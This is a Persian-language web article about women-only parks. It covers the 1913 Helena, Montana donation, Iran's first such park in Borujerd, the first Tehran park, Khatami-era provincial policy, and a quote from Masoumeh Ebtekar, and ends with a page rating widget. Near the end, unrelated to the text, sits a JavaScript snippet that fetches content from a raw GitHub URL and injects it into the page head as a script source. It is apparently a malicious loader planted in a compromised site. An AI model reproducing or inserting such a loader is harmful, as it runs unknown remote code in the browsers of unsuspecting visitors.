پارک بانوان

 • پارک بانوان به پارک‌هایی گفته می‌شود که فقط برای بانوان است. در این نوع پارک‌ها از ورود مردان (پسر، برادر، نامزد، شوهر، پدر و…) جلوگیری می‌شود.

  تاریخچه

  اولین پارک بانوان در ایالات متحده در پی درخواست یک زوج از شهرداری در هلنا (مونتانا) ساخته شد ولی در ایران، پارک بانوان بروجرد، اولین پارک ویژه زنان بوده‌است.

  زوجی به نام چیمز و مری هیل در سال ۱۹۱۳ زمینی را در شهر هلنا برای ایجاد پارک به شهرداری اهدا کردند، این پارک را می‌توان اولین پارک بانوان جهان نامید.

  سابقه ساخت بوستان زنان در ایران به اوایل دهه ۸۰ خورشیدی بر می‌گردد. ادعا می‌شود در ایران، بروجردی‌ها نخستین کسانی بودند که دریافتند شهر و بیشتر امکانات آن مردانه است و در میان شهرشان جای یک خلوت زنانه کم است، از این رو اقدام به تأسیس یک پارک بانوان نمودند. نخستین بوستان تهران در سال ۱۳۸۷ در خیابان بو علی، بزرگراه آزادگان افتتاح شد و به‌طور کامل استتار شده‌است به گونه ای که بانوان به راحتی می‌توانند راحت و آزاد در پارک تردد کنند.

  پارک بانوان بروجرد در سال ۱۳۹۴ مبلغی بالغ بر ۶۰ میلیون تومان به منظور تجهیز این مجموعه تفریحی صرف شد.

  بوستان بانوان در ایران

  اختصاص حداقل یک پارک یا بوستان به زنان در هر استان از پیشنهاد جدی دفتر امور زنان وزارت کشور در دوران ریاست جمهوری سید محمد خاتمی بود که با صدور مجوز اختصاص بخشی از بودجه عمرانی استان‌ها به این امر، مقدمات آن فراهم آمد و متناسب نیاز استان و پیگیری‌های صورت گرفته توسط دفاتر امور زنان آن، اقداماتی صورت گرفت.  پارک‌های بانوان با رویکرد تفکیک جنسیتی از جمله راهکارهای پیشنهادی جهت حضور و بهره‌مندی بیشتر بانوان با توجه به نیازهای فیزیولوژیک و رفع محدودیت‌های بهره‌مندی آنان از فضای سبز شهری مشترک است که در دهه اخیر در بسیاری از کلان‌شهرها و شهرهای ایران ایجاد و مورد بهره‌برداری قرار گرفته‌است.

  معصومه ابتکار معاون رئیس‌جمهور در امور زنان و خانواده گفت: توسعه پارک‌های بانوان یک ضرورت ملی است. نتایج بسیاری از تحقیقات میدانی که در زمینه رضایت زنان از پارک‌های بانوان انجام شده‌است، نشان می‌دهد بسیاری از زنان استفاده‌کننده از پارک‌های بانوان، استراحت کنند و ملزم به حفظ پوشش عمومی زنان ایرانی در جامعه نباشند، راضی به نظر می‌رسند.

  (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

  امتیاز شما:

  میانگین امتیازات ۵ از ۵
  از مجموع ۱ رای

  دیدگاهتان را بنویسید